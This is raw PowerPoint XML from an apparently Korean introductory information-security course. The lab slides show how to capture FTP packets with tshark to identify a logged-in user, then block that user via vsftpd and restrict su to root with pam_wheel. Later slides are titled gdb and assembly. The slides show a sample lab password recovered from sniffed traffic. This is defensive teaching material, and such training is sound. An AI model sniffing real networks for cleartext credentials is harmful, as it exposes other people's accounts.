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55" r:id="rId3"/>
    <p:sldId id="291" r:id="rId4"/>
    <p:sldId id="288" r:id="rId5"/>
    <p:sldId id="292" r:id="rId6"/>
    <p:sldId id="293" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="297" r:id="rId9"/>
    <p:sldId id="298" r:id="rId10"/>
    <p:sldId id="299" r:id="rId11"/>
    <p:sldId id="300" r:id="rId12"/>
    <p:sldId id="301" r:id="rId13"/>
    <p:sldId id="302" r:id="rId14"/>
    <p:sldId id="664" r:id="rId15"/>
    <p:sldId id="665" r:id="rId16"/>
    <p:sldId id="666" r:id="rId17"/>
    <p:sldId id="667" r:id="rId18"/>
    <p:sldId id="668" r:id="rId19"/>
    <p:sldId id="660" r:id="rId20"/>
    <p:sldId id="659" r:id="rId21"/>
    <p:sldId id="658" r:id="rId22"/>
    <p:sldId id="661" r:id="rId23"/>
    <p:sldId id="663" r:id="rId24"/>
    <p:sldId id="1202" r:id="rId25"/>
    <p:sldId id="308" r:id="rId26"/>
    <p:sldId id="309" r:id="rId27"/>
    <p:sldId id="310" r:id="rId28"/>
    <p:sldId id="311" r:id="rId29"/>
    <p:sldId id="315" r:id="rId30"/>
    <p:sldId id="316" r:id="rId31"/>
    <p:sldId id="317" r:id="rId32"/>
    <p:sldId id="669" r:id="rId33"/>
    <p:sldId id="312" r:id="rId34"/>
    <p:sldId id="313" r:id="rId35"/>
    <p:sldId id="314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6" r:id="rId44"/>
    <p:sldId id="327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FBBD5-0969-406C-A2C6-FF7FD6D8D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87C1B1-8D31-4D93-852F-E8D6C6A77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1DD91-D00B-4513-B545-70B4074B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536D-D04D-419A-87B1-DD9EE21A00B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99D3C-4A67-497B-8EDA-AD1A0985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AE458-65A0-44F8-ADEE-D1557472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A55B-8446-4347-BE7F-9F58F8AE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5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A6103-AB7E-4C46-86EC-869333F0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4F9A23-0566-4FEE-BBEA-27ACA0B22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7446F-B27D-4FBC-9838-A4BC5A7E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536D-D04D-419A-87B1-DD9EE21A00B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5D525-888A-40B5-821C-3F1877E8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B4EDA-F3AC-4D31-9C78-7835ED76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A55B-8446-4347-BE7F-9F58F8AE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77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452414-447F-46A2-83D9-6AA0595F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7EFB29-F150-4BE4-B921-368DD908E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B7F23-0EC6-42C8-9BE3-856525D9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536D-D04D-419A-87B1-DD9EE21A00B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9BF3E-AEFE-4DED-9F30-70EB82F5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55537-B934-4B9F-9E69-9C2563C2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A55B-8446-4347-BE7F-9F58F8AE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16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5891" y="6492876"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E0E6B02A-ACCF-4DB7-A098-5AABA2E0F72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6" descr="1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7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1" y="836712"/>
            <a:ext cx="12192001" cy="6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9304707" y="11663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정보보호 개론</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134255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FF42C-C345-4933-8FF0-23BF4AD0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FE745-3605-4003-91C3-A445E655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BB1A1-97B1-427E-8262-ED43EE8D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536D-D04D-419A-87B1-DD9EE21A00B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ABD8E-0DBE-4415-8E24-86D142C3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F4B27-9DD5-40DC-BB3E-C767C409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A55B-8446-4347-BE7F-9F58F8AE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BF15F-BC64-4C86-B235-3A9EFF12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9377FC-8B13-4D55-B0E7-296A5BE0B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A3F30-CED7-4D32-A551-E1EA1A0F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536D-D04D-419A-87B1-DD9EE21A00B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099B0-DCAC-4A7D-AAC1-4FFB283F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B138E-A1AE-4830-9132-EA298FEE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A55B-8446-4347-BE7F-9F58F8AE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8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14DBA-4568-49E2-BD7E-CE5EE91C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CC400-EF37-4DC6-8009-51404E963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499B93-C13D-49A4-BEFD-62FEF2FAB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53D1B2-9660-437D-BDA6-29179A0F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536D-D04D-419A-87B1-DD9EE21A00B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7A0A8-D94B-48A4-A02F-06C3DD8D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33B67-8692-41E6-AF37-7439CD76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A55B-8446-4347-BE7F-9F58F8AE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0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D5D00-0F0E-4CE1-B475-76893FD5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407F26-DB2A-4AAD-9772-AA84AD863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88668-3FEF-481E-9CE0-39DEEC820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F1974D-83FA-4631-B0B6-07D67FACB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AD0A94-0893-4A53-9290-A0D2F3889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2A6C16-2A3A-4401-857F-07F50A3A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536D-D04D-419A-87B1-DD9EE21A00B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6F8FC9-C528-49A9-9774-AF26C54A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4EB4B2-2F7A-4AC4-8B02-39DF2641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A55B-8446-4347-BE7F-9F58F8AE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48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20CD7-6CC6-4830-A0B3-B06547CB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FC691A-FEE6-4801-ABC9-4A094D80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536D-D04D-419A-87B1-DD9EE21A00B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D8A846-94AE-4A0A-9D14-F9DF341E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4A1702-98DB-4309-A9F5-AF1B42E5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A55B-8446-4347-BE7F-9F58F8AE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5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370923-2AA0-44E2-A5DA-F478DA31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536D-D04D-419A-87B1-DD9EE21A00B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884B1A-191E-41E2-A57E-F61E6480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975A3-7EAB-48DF-ACBF-A5B7FAA0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A55B-8446-4347-BE7F-9F58F8AE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D9E51-21AF-48F1-B6D4-2EE996B6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190F1-3A61-4394-A8B7-E4373050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FD6006-5D0C-4287-8E15-24216E66C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CFAD15-C4BD-42DB-8580-37FA3597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536D-D04D-419A-87B1-DD9EE21A00B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F3D24-14FD-407E-AC2D-49E98907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B8D2BA-2F46-4823-80A4-21D2882E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A55B-8446-4347-BE7F-9F58F8AE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8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812A1-2BF1-40A5-B20D-C44CBA77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BA14E7-3BE0-4604-ABDA-3CCC65CF9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DB25B0-3482-43CC-ABD7-844629D34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AC7B52-1996-40AD-8341-C2239D53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536D-D04D-419A-87B1-DD9EE21A00B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442D55-BC3D-4F15-B6B7-C1BC6064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8900BB-410B-49B2-B9B4-0AC7BAF9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8A55B-8446-4347-BE7F-9F58F8AE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00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18A81D-9A2F-4B29-856E-28D49817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2A969-FB80-4858-A36A-949496D9C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7924F-DBAB-47CA-B696-638E789B0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536D-D04D-419A-87B1-DD9EE21A00BE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859FE-1AD3-4EFA-B6E1-75C1317D0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F1A08-DC55-4A0D-B675-C7858E749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8A55B-8446-4347-BE7F-9F58F8AE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4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7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gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59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gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.gi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C3FF9-0DAA-4D07-8080-DB4B9CD8A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정보보호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>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2864F3-6F5B-4D07-9873-29AF11807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5576"/>
            <a:ext cx="9144000" cy="912223"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>사이버과학과 백도우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90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/Training/Unit/Sys/4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 4.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계정 원격 접속 탐지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FTP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서비스에 접속하여 사용 중인 사용자를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패킷 분석 도구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tshark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알아내고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vsftpd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설정을 통해 해당 계정의 접속을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차단하시오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패킷 캡처 및 저장 시작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tshark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-c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패킷수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–w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저장된 패킷 보기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tshark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–r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vsftpd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차단 사용자 목록 파일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/etc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vsftpd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/user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_list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4)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재시작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service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restart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원격 접속을 탐지하고 대응할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7A45B3D-2CB8-453B-8D79-65C1065A79DA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218C406-B480-452C-B3B9-2E255F46DA6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9C9462-9415-46AA-A63D-09128298265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E90C56FA-1520-44BB-864E-6B7C29FF30D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97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0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200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>개의 패킷 캡처 및 저장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tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -c 200 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.txt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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>저장된 패킷 검토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tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>r packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more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※ navy123 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비밀번호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>: qwer1031</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 접속했음을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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>차단 사용자 목록에 해당 계정 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9"/>
            <a:ext cx="5616792" cy="5052088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   # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>vi /etc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vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>_list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맨 마지막에 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작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service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> restart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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 패킷을 캡처하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접근이 거부됨을 확인할 수 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7" name="Picture 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E184BD-4519-40CB-8627-41235BA5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4" t="80601" r="19333" b="2136"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="570593" y="920963"/>
            <a:ext cx="4300093" cy="602107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847C6A-0C4E-40C3-B79F-B635824B71D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="570593" y="1658568"/>
          <a:ext cx="4932807" cy="98018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814915203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tshark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92671"/>
                  </a:ext>
                </a:extLst>
              </a:tr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-c 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캡처할 패킷들의 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-w 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캡처한 패킷들을 저장할 파일 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-r :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캡처된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패킷들이 저장된 파일 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779775"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B2D52D7-8B2A-431B-90DB-7A08F5C32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4" t="13784" r="1234" b="4042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="570022" y="3277627"/>
            <a:ext cx="4841422" cy="257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38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EEEF75B-AA02-45F9-9FA8-FEEA823750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-294" b="14213"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281892" y="855949"/>
            <a:ext cx="5033807" cy="22476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3E24A63-6A2A-4567-9AEC-153B392CE67B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6281892" y="3212200"/>
          <a:ext cx="4932807" cy="73634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277954937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_list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777403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437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/etc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vsftpd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/user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_list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설정에 따라 접속 허용 목록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(white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접근 거부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(black list)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지정할 수 있음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11958"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC205F13-DB4D-47D5-980E-E30E80030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892" y="4506414"/>
            <a:ext cx="5005578" cy="564515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16F562-66DB-47A3-ABB9-C161B92AF74F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5529725"/>
            <a:ext cx="5616792" cy="95927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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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DF64BA6-C2B2-4A18-BB87-B49CD5884349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34A2051-289E-4A23-AE45-C548601B6034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41D386-6256-4413-A7D6-79612E117A1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" name="화살표: 오른쪽 17">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650BC3A8-2AC6-4D71-9591-46303462FC9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6027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/Training/Unit/Sys/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 5.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계정 우회 접속 탐지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서버에 계정 우회 접속하여 사용 중인 사용자를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패킷 분석 도구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tshark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알아내고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제한하시오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접속 로그 파일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/var/log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/secure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2)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 제한 설정 파일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/etc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pam.d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우회 접속을 탐지하고 대응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(Kali)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5E9CCA2-7560-45A5-8A46-ED28BB2E650A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F76DE843-9ABD-435E-A5FF-7D5520B7854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69AAD6-9176-402D-BFC2-B19F8F1F524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02EF713-5D02-4251-A324-8B9EADC68DA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579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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시스템 접속 로그 점검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tail /var/log/secure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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>원격에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>명령으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정으로 전환함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을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 dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용 제한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vi /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pam.d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su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#auth required pam_wheel.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>use_uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>#(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주석</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거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477450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   * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>변경전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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>변경후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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 로그를 확인하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환되지 않음을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC385B03-C822-4C67-BC17-8209D9217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" t="13865" r="713" b="3014"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="884701"/>
            <a:ext cx="4898572" cy="243998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F4C8086-E19B-462A-9CA8-459B472F8D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="547578" y="3655169"/>
          <a:ext cx="4932807" cy="49250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357263476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tail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9298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tail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파일의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="10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마지막 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="10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행</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="10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(line)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="10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출력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25299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7FCA47-A7D7-4F4B-8038-69A7D2A9139E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="550068" y="4174175"/>
          <a:ext cx="4932807" cy="49250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409043473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uid=0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7629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리눅스에서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계정은 관리자 권한을 가진다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167500"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0045126F-08FC-4771-9D61-6F89024891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5" b="49604"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391729" y="720992"/>
            <a:ext cx="4760686" cy="136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46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A28C8146-D035-4A9C-813B-6469F977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729" y="2370412"/>
            <a:ext cx="4780407" cy="11170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C56F90-7683-44C6-8F22-DF14E7DE3B15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6392300" y="3599625"/>
          <a:ext cx="4932807" cy="122402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3445345418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PAM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(Pluggable Authentication Modules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353260"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="844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레드햇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기반 리눅스에서 많은 프로그램이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PAM(Pluggable Authentication Modules)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이라는 중앙 인증 메커니즘을 사용하도록 구성된다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PAM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플러그 가능한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(pluggable)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모듈러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(modular)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아키텍처를 사용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관리자가 시스템에 대한 인증 정책을 설정할 때 유연성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(flexibility)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제공한다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20162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D254592-FBE8-4AAF-A7D8-B4F597D4E1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="547578" y="5376141"/>
          <a:ext cx="4932807" cy="98018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243223570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pam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_wheel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.so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36320"/>
                  </a:ext>
                </a:extLst>
              </a:tr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pam</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000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wheel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모듈은 휠 그룹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(wheel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시행하는 데 사용된다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휠 그룹에 포함된 계정에 대한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사용을 허용한다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이름의 그룹이 없으면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그룹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root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대상으로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87017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175EE9C-5C2D-492B-B0BC-C2F0D9F2A36A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5242769"/>
            <a:ext cx="5616792" cy="12462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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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9E8A83-84C8-40CE-8A56-9A690170D4F5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8C1627A-B8F9-49C4-B95C-AFB4FA87346B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F83EAF-CEC9-4FE9-87ED-66E5474C23E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0" name="화살표: 오른쪽 19">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97710E03-9510-4373-94DC-274D82D30D56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78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/Theory/T18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gdb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사용법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183A7CE2-82B6-4927-9876-5F31E4C6A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1" y="1856821"/>
            <a:ext cx="5364243" cy="400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AC0586F6-8ECF-4283-A457-03F47D6EE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608" y="1856821"/>
            <a:ext cx="5726611" cy="427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19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/Theory/T18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gdb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사용법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0AA773C-14EF-4A37-BBC0-6F886F26F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1" y="1921912"/>
            <a:ext cx="5285154" cy="394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AF4890CE-C619-4B37-BCE4-BE23F2D35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527" y="1921912"/>
            <a:ext cx="5517933" cy="411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570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/Theory/T18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gdb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사용법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06A785F-3827-4F15-8E20-629BE1C1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95" y="1690688"/>
            <a:ext cx="5321187" cy="396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4B8CDBE8-9EEE-46C3-9DA3-704751E93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019" y="1676655"/>
            <a:ext cx="5769213" cy="430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134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/Theory/T18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gdb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사용법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F7B2141-F865-4F5C-9BD5-31D15E870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86" y="1676655"/>
            <a:ext cx="5515876" cy="411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CE2D9F07-11BD-46B8-B88E-7E252BF7A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97" y="1676655"/>
            <a:ext cx="5712734" cy="426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73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/Theory/T18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gdb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사용법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98F93CF-81E5-494D-8043-F353848B1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1666304"/>
            <a:ext cx="5726611" cy="427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421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/Theory/T19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어셈블리어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&amp;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메모리 구조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38C2BF-E737-4CF1-9271-B620FB4F62E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838199" y="1921912"/>
            <a:ext cx="5109376" cy="1485791"/>
            <a:chOff x="1196835" y="1885839"/>
